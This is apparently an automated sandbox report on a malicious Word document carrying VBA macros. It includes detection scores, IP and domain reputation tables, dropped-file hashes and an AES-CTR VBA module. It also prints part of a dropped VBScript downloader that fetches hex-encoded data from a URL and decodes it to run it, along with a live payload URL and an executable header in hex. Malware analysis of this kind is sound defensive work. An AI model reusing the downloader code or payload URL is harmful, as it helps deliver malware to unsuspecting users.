Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
5UnAIdF7m2.docx51%VirustotalBrowse
5UnAIdF7m2.docx42%ReversingLabsWin32.Trojan.Leonem
5UnAIdF7m2.docx100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
gitlab.com
172.65.251.78
truefalse
    high
    NameMaliciousAntivirus DetectionReputation
    https://gitlab.com/app8490744/updatesa/-/raw/main/upfalse
      high
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      172.65.251.78
      gitlab.comUnited States
      13335CLOUDFLARENETUSfalse
      Joe Sandbox version:42.0.0 Malachite
      Analysis ID:1590806
      Start date and time:2025-01-14 15:41:03 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 7m 17s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Run name:Without Instrumentation
      Number of analysed new started processes analysed:10
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:5UnAIdF7m2.docx
      renamed because original name is a hash value
      Original Sample Name:0b59afb80d97e62328ab8719df49c0c2e45c1ce243bc0b3299f97e2c01cf33f5.docx
      Detection:MAL
      Classification:mal100.expl.evad.winDOCX@4/5@1/1
      EGA Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .docx
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, conhost.exe
      • Excluded IPs from analysis (whitelisted): 52.109.76.240, 52.113.194.132, 52.109.28.47, 2.22.50.144, 2.22.50.131, 13.89.179.8, 2.20.245.216, 2.20.245.225, 23.196.3.178, 23.196.3.185, 2.18.64.220, 2.18.64.211, 2.23.242.162, 52.111.243.40, 52.111.243.43, 52.111.243.41, 52.111.243.42, 2.23.240.50, 20.190.159.71, 52.149.20.212, 20.12.23.50, 13.107.246.45
      • Excluded domains from analysis (whitelisted): e1324.dscd.akamaiedge.net, binaries.templates.cdn.office.net.edgesuite.net, slscr.update.microsoft.com, templatesmetadata.office.net.edgekey.net, a767.dspw65.akamai.net, eur.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, dns.msftncsi.com, a1847.dscg2.akamai.net, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, templatesmetadata.office.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, uci.cdn.office.net, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com, fe3cr.deli
      • Not all processes where analyzed, report is missing behavior information
      • Report size exceeded maximum capacity and may have missing network information.
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryAttributesFile calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtReadVirtualMemory calls found.
      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
      No simulations
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      172.65.251.78build_setup.exeGet hashmaliciousVidarBrowse
      • gitlab.com/greg201/ppi3/-/raw/main/Setup.exe?inline=false
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      gitlab.comVRO.exeGet hashmaliciousUnknownBrowse
      • 172.65.251.78
      mP8rzGD7fG.dllGet hashmaliciousUnknownBrowse
      • 172.65.251.78
      VRO.exeGet hashmaliciousUnknownBrowse
      • 172.65.251.78
      mP8rzGD7fG.dllGet hashmaliciousUnknownBrowse
      • 172.65.251.78
      iTVsz8WAu4.exeGet hashmaliciousUnknownBrowse
      • 172.65.251.78
      HLi4q5WAh3.exeGet hashmaliciousUnknownBrowse
      • 172.65.251.78
      e0691gXIKs.exeGet hashmaliciousUnknownBrowse
      • 172.65.251.78
      hJ1bl8p7dJ.exeGet hashmaliciousUnknownBrowse
      • 172.65.251.78
      Y4TyDwQzbE.exeGet hashmaliciousUnknownBrowse
      • 172.65.251.78
      DYv2ldz5xT.exeGet hashmaliciousUnknownBrowse
      • 172.65.251.78
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      CLOUDFLARENETUSoriginal.emlGet hashmaliciousUnknownBrowse
      • 1.1.1.1
      https://cloud.uibakery.io/share/Z0My4XaLtq/homeGet hashmaliciousUnknownBrowse
      • 172.67.70.48
      NoticeOfPayment.docxGet hashmaliciousUnknownBrowse
      • 172.64.146.81
      http://links.notification.intuit.com/ls/click?upn=u001.Hu9nToJLxsJSQR8ZHWn8Ib7JikYF6PNXv5VK-2BAfeSpVHPRNy-2BFDtJ-2BhNUfKXTverofrKjvXVKH4ba5KbTX-2BS4d1fnHXIidRtPiokrK2um0Eple-2FkJVLqDQnYz8JTbzkA9WlXWZlL3ivdsx3brpVaTH-2FK6m9Qw3cu-2BvTOlnjPR-2BRQieb3dMUHHYNG5OQm5ryxF0Fsg8fRojMxisWNsOHrH9C1cyNh2C-2BapzmizNqUYRxhHtg93ylBbIqH4SXA-2BcyHnCgzv3EsQu4AeMgUYmPWnA-3D-3DLdh5_yvrO630WiuT7pZuPPGURxafPbqYMaSDh9TJohqr8UezRE8eV8vDlm-2BTA5TmdEDZ7yETp46OEIM2MjRx5Mgc-2FSy44clVANtwLrq3nrTfwacsucNAXy1OR1t4kO8Runkcodfdl27Tk2P3ljoutL4PngQr5QuG6-2BzAFT5LByFkcNsd4ZN4BjPhWe-2FurNg8n55w3pC1a745KRvgSQJLhnfGqvVCPndWBC-2FrOGmouU9sI8e8126CrPE36g6YnfTU62FfgD4iz7YqhY5ClzJJ1rfDytmBE27deoiPYjSCUIOExKeOY9BXwol6hEnBu1JrowSiwfKjh7zwfuBtmrvZ6vSOSA4TPvkxfFcg8BlrW1vQm3N4xNhNATHmDPJ14VDZ37GTEiI3qtLYdiyXWWkTzMMnRfMqqHTb6pk7iw0nQ-2B-2F-2BoVFAByTiDqFl-2BEIRuBMpx3EAFKUBzR-2BFkYOUJfVO0AgKNNrj8RX8iEkzqu1jtQg7ixHYmsOTyS67b-2FfHfta82o4E2JYjYGlK5-2B4oC7YaK6nqpfLyDha24FrKV-2FLp72I4nvgzKLPEnT5ZwYuSOhCg3YVBTmOz2nIgG2JSkyg5oeFqAqgkNSx8fK8zislf-2BrA2fYIACU0BIPGyf0fmRMsEmqkL-2Bp3BFpdaGyMHdF1x-2BecUEBz6lLoiPwOcsUtngmDNDJXvvknBRqzikOl9M6fGqG3fXa1gCTdQ65koy28-2F-2BBWPXowJpnZS4HZIyZUo5CD6QHJWBreucOVPnNwQeZjC-2FzCK4Cce5NO367-2F8X6iGngzToJ76PKlG3iKmQrD2mUaULlSVRgzOCG3qGCu5c3-2FNswHxTGs5sX1Z4U8SbnKLBV1PKGCxM9T4n09h2aVmLlExK8v00nv29XzsU7Po9gelTF-2FjMSswYLkMiSOnzlY2BCdCwDuNC1nvBteBGpD-2F22OmpeXpRAaJ0J-2B4lsJiYMNTfeLTVpUwXJ8O1S1sYa5RHOdrs-2FcoPQw3UvxHuDk-2F8iCLoYwSk9C9RD2cz2elRWzi1C1ns-2FlhCnZAhjcKv9Z9Ae1z44jmN81TExev-2BlHq6EzmdhrItggowvzubiVKpLOI41-2FppAUrbGiqMHyKjd3-2F4kk-2Flz32iYslSzl6Dn0eXeS9GKE-2Bpl29Z6ROXa7u-2B5uui0VMIdUdli6dq52DdaYFYPlzSXZJZD6dU1iBoKstrswPNVadTn-2FAGgQ05qSC-2Bkb7G8HU-2BK5xqU5Ufalh9-2FjFROiYaxD3E-2Bu8NoLa7LrZn2WpO-2F0jyY6Vd6CrNPSPrDmzB8lSbamUhpcGSHkMvagS5o-2By7jAAciI99IX68zm80Q3YVM-2BJI1Dy0kwunCbTG4zRPUdxDxmPiGishQoGtkqOda43zr5FgVLFBsuyricc5CP0Uj0NZhEVb-2Br-2FOT93qdqnJE6-2FTp6T2R9YtWtiv-2BEfeLsX6gcdvCtN3M6I13WFY-2ByaP1CVexX5752k6SmFvyspk50EqGet hashmaliciousUnknownBrowse
      • 1.1.1.1
      http://nkomm.frGet hashmaliciousUnknownBrowse
      • 1.1.1.1
      https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fjobuli.in%2Fwinner%2FsXtxg%2FbWFyc2hhLnJvd2xhbmRAY2hlcm9rZWVicmljay5jb20=?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmGet hashmaliciousHTMLPhisherBrowse
      • 104.18.11.207
      https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fmessagupdates.courtfilepro.com%2FVTtMaGet hashmaliciousHTMLPhisherBrowse
      • 104.17.25.14
      https://1143b54.wcomhost.com/Get hashmaliciousUnknownBrowse
      • 172.67.162.22
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      37f463bf4616ecd445d4a1937da06e19LrBF2Z930N.exeGet hashmaliciousRemcos, GuLoaderBrowse
      • 172.65.251.78
      2T10XBqS6g.exeGet hashmaliciousRemcos, GuLoaderBrowse
      • 172.65.251.78
      183643586-388657435.07.exeGet hashmaliciousUnknownBrowse
      • 172.65.251.78
      Handler.exeGet hashmaliciousDanaBot, VidarBrowse
      • 172.65.251.78
      sysadmin.exeGet hashmaliciousVidarBrowse
      • 172.65.251.78
      JUbmpeT.exeGet hashmaliciousVidarBrowse
      • 172.65.251.78
      149876985-734579485.05.exeGet hashmaliciousNitolBrowse
      • 172.65.251.78
      149876985-734579485.05.exeGet hashmaliciousUnknownBrowse
      • 172.65.251.78
      No context
      Process:C:\Windows\SysWOW64\wscript.exe
      File Type:ASCII text, with very long lines (65536), with no line terminators
      Category:dropped
      Size (bytes):78347968
      Entropy (8bit):3.9608770038040686
      Encrypted:false
      SSDEEP:24576:CPeNKU1jkuVGTONfLKNvW4zuRfddSylFijQgAu55ZVaFZDyqlPN+aX49HbzyP+mA:+
      MD5:867EB339A005A6C7A63D6F9C81D7EA98
      SHA1:A30386E1345672ADFBAFB333936025B57C757FEE
      SHA-256:5C1997166E6ED7BD049B5A4CFD074C230B867A8743BF668102AA1E1E41DEF33C
      SHA-512:71D8E511AEA3C0BB625B86F6161577F4CDD869026708C8CF8CE412CD7861292376B879A02442FF40FE6394CEED9E6BAC0D930FD244239E4ACE8B9D03D13E13CE
      Malicious:false
      Yara Hits:
      • Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\up[1].txt, Author: Florian Roth
      Reputation:low
      Preview:4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000000100000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a24000000000000000a598b174e38e5444e38e5444e38e544474076445838e5448dbbe6455a38e5448dbbe1455c38e5448dbbe0451138e5443eb9e1454638e5443eb9e4454338e5444e38e444463ae5445dbce6455b38e5445dbcec45c33ae5445dbce5454f38e5445dbc1a444f38e5445dbce7454f38e544526963684e38e54400000000000000005045000064860a00215f11670000000000000000f00022000b020e2800aa6100008232000000000090fe5c00001000000000004001000000001000000002000006000000000000000600000000000000000096000004000000000000020060c100001800000000000010000000000000000010000000000000100000000000000000000010000000f0667900c4000000b46779006801000000708000b008150000a07b00fc600300f8a35502681b0000008095002c7e0000b0a67000540000000000000000000000000000000000000080a87000280000004045620040010000000000000000000000d06100c80e0000a4647900
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):512
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BF619EAC0CDF3F68D496EA9344137E8B
      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
      Malicious:false
      Reputation:high, very likely benign file
      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):512
      Entropy (8bit):0.0
      Encrypted:false
      SSDEEP:3::
      MD5:BF619EAC0CDF3F68D496EA9344137E8B
      SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
      SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
      SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
      Malicious:false
      Reputation:high, very likely benign file
      Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
      File Type:data
      Category:dropped
      Size (bytes):162
      Entropy (8bit):2.850082889407734
      Encrypted:false
      SSDEEP:3:KVGl/lilKlRAGlMkvbbZQCn/lfllRvaTkT:KVy/4KDmCnbl
      MD5:EC0EB274DE8B789EEBD9F4B50DD635BE
      SHA1:CE48CD099B9FC188242F67F339F6860776C3F452
      SHA-256:6142945B93507C38B507D8D1761A377C85963A11231A553F10B44999A2C1DAE8
      SHA-512:15F6C65D6D299E7E79FEEF8DE5A20B0385CB9CB38241903E2D926761BDDBD5EFE79E7239764BA62D7589949038274828D9A0011F4EF97DE9A93C033D24FAF9E8
      Malicious:false
      Reputation:low
      Preview:.user..................................................j.o.n.e.s.............)............a.i............................................M....$/.}..i.........=.i
      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
      File Type:ISO-8859 text, with CRLF line terminators
      Category:dropped
      Size (bytes):2501
      Entropy (8bit):5.020222323449452
      Encrypted:false
      SSDEEP:48:7ATWCvMRrEbJ30Ubwa4nqS4YI0Mp3+yaFWjW2OwLCx/nMDKHxQS:7ATWCLJFbunqzx0MQyOKW2O+g/nMDKHb
      MD5:D2E302C91AF3A9659A3D83138C7A7730
      SHA1:AA414DA697FE383233787170F5602544A056D3BC
      SHA-256:AAB8903BFD0FAF05E2168C7AFFF5F3084BC04DEF3C8C4B12CB47E2E74F684C06
      SHA-512:F8FE7A25F7B7F5A23D4CF69168F53DE0B2FA0CF99CDCF6850F8564F4FDDA96265E9C3B33F6A1EAB80E2F0E32BB9A06EBD6FB3DC4894350C978853B7126EDE513
      Malicious:true
      Reputation:low
      Preview:Option Explicit..On Error Resume Next ' B? qua c.c th.ng b.o l?i....' Chuy?n d?i chu?i hex sang d?ng nh? ph.n..Function HexToBinary(hexString).. Dim i.. Dim length.. Dim byteArray().... length = Len(hexString) \ 2.. ReDim byteArray(length - 1).... For i = 0 To length - 1.. byteArray(i) = CByte("&H" & Mid(hexString, i * 2 + 1, 2)).. Next.... HexToBinary = byteArray..End Function....' T?i d? li?u t? URL..Function GetDataFromURL(url).. Dim http.. Set http = CreateObject("MSXML2.XMLHTTP").. http.Open "GET", url, False.. http.Send.... If http.Status = 200 Then.. GetDataFromURL = http.responseText.. Else.. GetDataFromURL = "" .. End If.. Set http = Nothing..End Function....' Gi?i m. v. ch?y l?nh t? chu?i nh? ph.n..Sub ExecuteDecryptedCode().. Dim EncodedBinary.. Dim binaryData.. Dim SavePath.. Dim fileNum.. Dim objFSO.. Dim objFile.. Dim i.... ' L?y chu?i nh? ph.n t? trang web.. EncodedBinary = Ge
      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: ADMIN, Template: Normal.dotm, Last Saved By: Bruno, Revision Number: 32, Name of Creating Application: Microsoft Office Word, Total Editing Time: 29:00, Create Time/Date: Mon Dec 16 06:28:00 2024, Last Saved Time/Date: Sun Dec 15 16:37:00 2024, Number of Pages: 1, Number of Words: 3, Number of Characters: 21, Security: 0
      Entropy (8bit):4.944997139401776
      TrID:
      • Microsoft Word document (32009/1) 54.23%
      • Microsoft Word document (old ver.) (19008/1) 32.20%
      • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
      File name:5UnAIdF7m2.docx
      File size:98'816 bytes
      MD5:9b6d32a2049de15b7054cbdf1e603dbb
      SHA1:1b46dce266ea31ba3365d9f6152d5fee68ae184f
      SHA256:0b59afb80d97e62328ab8719df49c0c2e45c1ce243bc0b3299f97e2c01cf33f5
      SHA512:03714bb6d027f2e91d3174125e287302b8c910978aeaa7c70741e1abf534e8aeac694c1774911420eac4b429e7ad1401bba2055f56c1ecbb698a1f660df7ec8c
      SSDEEP:3072:vSVBQH+JLnVqP/StD2kRBHDnD4qokPUqD6Dq8UvRJOyexoK:vSVWerAq8UvioK
      TLSH:F1A3E699F642C82ADBC415711CABD3FEB678BD0AAD48D71732A0731E3CB67A4C605784
      File Content Preview:........................>.......................'...........)...............&...E..............................................................................................................................................................................
      Icon Hash:35e5c48caa8a8599
      Document Type:OLE
      Number of OLE Files:1
      Has Summary Info:
      Application Name:Microsoft Office Word
      Encrypted Document:False
      Contains Word Document Stream:True
      Contains Workbook/Book Stream:False
      Contains PowerPoint Document Stream:False
      Contains Visio Document Stream:False
      Contains ObjectPool Stream:False
      Flash Objects Count:0
      Contains VBA Macros:True
      Code Page:1252
      Title:
      Subject:
      Author:ADMIN
      Keywords:
      Comments:
      Template:Normal.dotm
      Last Saved By:Bruno
      Revion Number:32
      Total Edit Time:1740
      Create Time:2024-12-16 06:28:00
      Last Saved Time:2024-12-15 16:37:00
      Number of Pages:1
      Number of Words:3
      Number of Characters:21
      Creating Application:Microsoft Office Word
      Security:0
      Document Code Page:1252
      Number of Lines:1
      Number of Paragraphs:1
      Thumbnail Scaling Desired:False
      Company:
      Contains Dirty Links:False
      Shared Document:False
      Changed Hyperlinks:False
      Application Version:1048576
      General
      Stream Path:Macros/VBA/Module1
      VBA File Name:Module1.bas
      Stream Size:689
      Data ASCII:. . . . . . . . * . . . . . . . . . 1 . . . . . . . . . . . . . . A - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 01 f0 00 00 00 2a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 31 02 00 00 85 02 00 00 00 00 00 00 01 00 00 00 96 41 2d ce 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Attribute VB_Name = "Module1"
      

      General
      Stream Path:Macros/VBA/Module11
      VBA File Name:Module11.bas
      Stream Size:1059
      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . h . . . ` . . . . . . . . . P . . . . . . . . . 8 . . . . . . . . .
      Data Raw:01 16 03 00 01 f0 00 00 00 92 03 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 99 03 00 00 f5 03 00 00 00 00 00 00 01 00 00 00 96 41 a5 a5 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      Attribute VB_Name = "Module11"
      

      General
      Stream Path:Macros/VBA/Module3
      VBA File Name:Module3.bas
      Stream Size:45138
      Data ASCII:. . . . . h . . . r 7 . . L . . . ( . . . 7 . . . . . . . . . . . . . A 0 . . . . . . . . . . . . . D . . . . . H . . c . R . e . g . . . . . . . . . . . . . . . . . R t l M o v e M e m o r y . . . . . N . P . . . . . . . . . . . . . . . . . . . . . . . . . . . V a r P t r . . . . T . x . . . 0 . . . . . . . . . . . . . . . . . . . . . . . h t o n l . . . . . \\ . . . . X . . . . . . . . . . . . . . . . . . . . . . . S y s t e m F u n c t i o n 0 3 6 . . . . . h . . . . . . . . . . . . . . . . . . . . . .
      Data Raw:01 16 03 00 01 68 05 00 00 72 37 00 00 4c 05 00 00 28 06 00 00 ff ff ff ff a4 37 00 00 dc 88 00 00 00 00 00 00 01 00 00 00 96 41 f5 30 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 44 04 00 00 00 00 48 02 20 00 63 00 ff ff 52 00 65 00 67 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 74 6c 4d 6f 76 65 4d 65 6d 6f 72 79 00 00 00 00 00 4e 02 50 00 00 00 00 00 00 00 00
      Attribute VB_Name = "Module3"
      '--- mdAesCtr.bas
      Option Explicit
      DefObj A-Z
      
      #Const HasPtrSafe = (VBA7 <> 0) Or (TWINBASIC <> 0)
      
      '=========================================================================
      ' API
      '=========================================================================
      
      #If Win64 Then
          Private Const PTR_SIZE                  As Long = 8
      #Else
          Private Const PTR_SIZE                  As Long = 4
      #End If
      
      #If HasPtrSafe Then
      Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
      Private Declare PtrSafe Function ArrPtr Lib "vbe7" Alias "VarPtr" (Ptr() As Any) As LongPtr
      Private Declare PtrSafe Function htonl Lib "ws2_32" (ByVal hostlong As Long) As Long
      Private Declare PtrSafe Function RtlGenRandom Lib "advapi32" Alias "SystemFunction036" (RandomBuffer As Any, ByVal RandomBufferLength As Long) As Long
      '--- bcrypt
      Private Declare PtrSafe Function BCryptOpenAlgorithmProvider Lib "bcrypt" (phAlgorithm As LongPtr, ByVal pszAlgId As LongPtr, ByVal pszImplementation As LongPtr, ByVal dwFlags As Long) As Long
      Private Declare PtrSafe Function BCryptCloseAlgorithmProvider Lib "bcrypt" (ByVal hAlgorithm As LongPtr, ByVal dwFlags As Long) As Long
      Private Declare PtrSafe Function BCryptGetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, pbOutput As Any, ByVal cbOutput As Long, cbResult As Long, ByVal dwFlags As Long) As Long
      Private Declare PtrSafe Function BCryptSetProperty Lib "bcrypt" (ByVal hObject As LongPtr, ByVal pszProperty As LongPtr, ByVal pbInput As LongPtr, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
      Private Declare PtrSafe Function BCryptGenerateSymmetricKey Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phKey As LongPtr, pbKeyObject As Any, ByVal cbKeyObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
      Private Declare PtrSafe Function BCryptDestroyKey Lib "bcrypt" (ByVal hKey As LongPtr) As Long
      Private Declare PtrSafe Function BCryptEncrypt Lib "bcrypt" (ByVal hKey As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal pPaddingInfo As LongPtr, ByVal pbIV As LongPtr, ByVal cbIV As Long, pbOutput As Any, ByVal cbOutput As Long, pcbResult As Long, ByVal dwFlags As Long) As Long
      Private Declare PtrSafe Function BCryptDeriveKeyPBKDF2 Lib "bcrypt" (ByVal hPrf As LongPtr, pbPassword As Any, ByVal cbPassword As Long, pbSalt As Any, ByVal cbSalt As Long, ByVal cIterations As Currency, pbDerivedKey As Any, ByVal cbDerivedKey As Long, ByVal dwFlags As Long) As Long
      Private Declare PtrSafe Function BCryptCreateHash Lib "bcrypt" (ByVal hAlgorithm As LongPtr, phHash As LongPtr, ByVal pbHashObject As LongPtr, ByVal cbHashObject As Long, pbSecret As Any, ByVal cbSecret As Long, ByVal dwFlags As Long) As Long
      Private Declare PtrSafe Function BCryptDestroyHash Lib "bcrypt" (ByVal hHash As LongPtr) As Long
      Private Declare PtrSafe Function BCryptHashData Lib "bcrypt" (ByVal hHash As LongPtr, pbInput As Any, ByVal cbInput As Long, ByVal dwFlags As Long) As Long
      Private Declare PtrSafe Function BCryptFinishHash Lib "bcrypt" (ByVal hHash As LongPtr, pbOutput As Any, ByVal cbOutput As Long, ByVal dwFlags As Long) As Long
      #Else
      Private Enum LongPtr
          [_]
      End Enum
      Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
